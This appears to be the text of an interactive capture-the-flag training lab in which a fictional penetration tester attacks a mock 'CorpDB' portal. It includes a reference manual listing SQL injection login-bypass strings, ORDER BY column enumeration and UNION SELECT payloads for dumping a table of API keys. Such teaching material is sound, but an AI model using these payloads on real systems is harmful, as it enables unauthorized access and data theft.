SCENARIO

You are a contracted penetration tester hired by CorpDB Inc. to audit their internal web portal.

Intelligence gathered during pre-engagement suggests the login form and internal employee search functionality were developed without proper input sanitization. Your job is to confirm the vulnerability, gain unauthorized access, and exfiltrate sensitive data from the backend database.

The client suspects a table named secret_vault exists in the database and contains classified API keys. Your final objective is to retrieve its contents.

OBJECTIVES

Identify that the login form is vulnerable to SQL injection by observing verbose error output.

Bypass the login using a classic SQLi authentication bypass payload to gain admin access.

Discover that the employee search field inside the admin panel is also injectable.

Use ORDER BY to enumerate the number of columns returned by the query.

Craft a UNION SELECT payload to dump the secret_vault table and retrieve the flag.

Paste the extracted API key into the Incident Report and submit.

TOOLS AVAILABLE

🌐

Web Browser

Multi-tab browser — navigate to the target at corpdb.lab

📖

Reference Manual

SQLi cheat sheet with payloads, techniques, and examples

📝

Notepad

Take notes during the engagement

TARGET

🏢

CorpDB Portal

http://corpdb.lab | IP: 172.16.0.10

WEB BROWSER

＋

←

→

↻

★

🏢 CorpDB Portal

🔐 Login Page

⚙️ Admin Panel

LAB BROWSER

Navigate to the target or use the bookmarks above

🏢

corpdb.lab

172.16.0.10

CORPDB PORTAL

Internal database management system — Authorized personnel only

SYSTEM NOTICE

Welcome to the CorpDB internal portal. This system is for authorized employees only. Please log in with your credentials to access the employee database and management tools.

🔐

STAFF LOGIN

Access employee portal

📞

IT SUPPORT

[email protected]

STAFF LOGIN

Enter your credentials to access the portal

AUTHENTICATE

USERNAME

PASSWORD

EMPLOYEE SEARCH

Enter a name to search the employee database.

REFERENCE MANUAL — SQL INJECTION

WHAT IS SQL INJECTION?

SQL injection occurs when user input is inserted directly into a SQL query without sanitization. An attacker can manipulate the query logic to bypass authentication, extract data, or destroy records.

PHASE 1 — LOGIN BYPASS PAYLOADS

The login query likely looks like:
SELECT * FROM users WHERE username='INPUT' AND password='INPUT'
Inject into the username field to short-circuit the AND clause:

' OR '1'='1' --
' OR 1=1 --
admin' --
' OR 'x'='x
') OR ('1'='1

The -- comments out the rest of the query. Use any password when the username payload is injected.

PHASE 2 — UNION-BASED EXTRACTION

Once inside, find injectable fields. UNION SELECT lets you append results from other tables. You must first find the number of columns.

STEP 1 — ENUMERATE COLUMNS WITH ORDER BY

' ORDER BY 1 -- ← works
' ORDER BY 2 -- ← works
' ORDER BY 3 -- ← works
' ORDER BY 4 -- ← ERROR → 3 columns!

STEP 2 — UNION SELECT TO DUMP DATA

' UNION SELECT 1,2,3 --
' UNION SELECT table_name,2,3
FROM information_schema.tables --
' UNION SELECT vault_id,api_key,note
FROM secret_vault --

TIPS

• The number of columns in your UNION must match the original query
• Use -- or # to comment out trailing SQL
• If results show numbers like 1, 2, 3 — those are your injectable positions
• Target table: secret_vault with columns vault_id, api_key, note

INCIDENT REPORT — FLAG SUBMISSION

🔐 SQL Injection — Data Exfiltration

Successfully exploit the UNION-based injection to dump the secret_vault table. Copy the api_key value and paste it below.

Target Application

Exfiltrated API Key — paste the api_key value from secret_vault

CYBERSEC LAB

🎯 ASSIGNMENT GOALS

MISSION BRIEFING

CORPDB PORTAL

EMPLOYEE SEARCH